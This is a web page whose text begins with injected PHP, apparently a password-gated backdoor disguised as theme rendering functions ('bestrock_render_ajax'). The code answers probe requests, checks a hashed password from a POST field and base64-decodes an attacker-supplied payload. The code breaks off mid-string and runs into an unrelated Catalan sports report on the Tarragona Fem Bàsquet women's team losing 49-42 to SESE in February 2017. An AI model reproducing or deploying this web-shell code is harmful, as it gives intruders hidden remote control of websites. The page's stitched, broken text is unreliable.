function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet continua immers en la mala ratxa després de perdre contra el SESE (49-42) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet continua immers en la mala ratxa després de perdre contra el SESE (49-42)

Updated: febrer 5, 2017

El Tarragona Fem Bàsquet no pot sortir de la mala ratxa de resultats. L’equip lila ha tornat a perdre aquest migdia a la pista del SESE, un rival directe en la lluita per a la permanència i, amb aquesta derrota, ja són quatre les desfetes seguides, tres d’elles contra adversaris que juguen per evitar el descens. La derrota, però, hauria pogut ser pitjor perquè almenys les tarragonines han salvat l’average particular amb el SESE, que en el partit de la primera volta al Sagrat Cor havia perdut per 58-49.

Les noies que entrena Albert del Rey van fer una bona defensa però els problemes, com en els últims partits, van arribar en atac. Amb els 42 punts d’avui, l’equip lila ha sumat 44, 41 i 35 punts en les tres derrotes precedents, un símptoma preocupant quan arriba el moment crucial del curs perquè la primera fase conclou la setmana vinent i aleshores començarà la fase decisiva per jugar per mantenir la categoria. Les màximes anotadores van ser Laura Vilamajor i Ona Fort, amb 12 i 10 punts respectivament. La pivot va ser la millor de l’equip altra vegada amb 25 de valoració. «Estem trobant a faltar el concurs de Pasku. Des que es va lesionar no ha sigut la mateixa i això ens afecta. Necessitem recuperar la seva millor versió», va afirmar Albert del Rey. Laura Pascual ha fet 4 punts, tots de tirs lliures (0/9 en tirs de camp). De fet, el Tarragona Fem Bàsquet ha fet unes estadístiques molt pobres amb un 24% d’encert en tirs de dos i un 19% en triples (66 en tirs lliures).

El matx va començar malament per les lila que es van trobar una defensa en zona que es convertia en una individual molt tancada a l’inici. Així, les visitants només van poder anotar 7 punts en el primer quart (9-7) i un total de 16 al descans (26-16). El SESE ha fet un parcial de 13-0 en els últims minuts del segon quart que s’ha convertit en 18-0 en l’arrencada del tercer període.

Tot i que el panorama no era molt engrescador, les noies del Tarragona Fem Bàsquet han començat a retallar distàncies des de la defensa. Així, a l’inici del quart període el desavantatge era només de 3 punts (33-30) però ha faltat encert a l’hora de capgirar la dinàmica del matx. El SESE ha obert un forat decisiu a poc més d’un minut per acabar l’enfrontament (47-40) i l’average ha perillat, però finalment la diferència no ha superat els deu punts.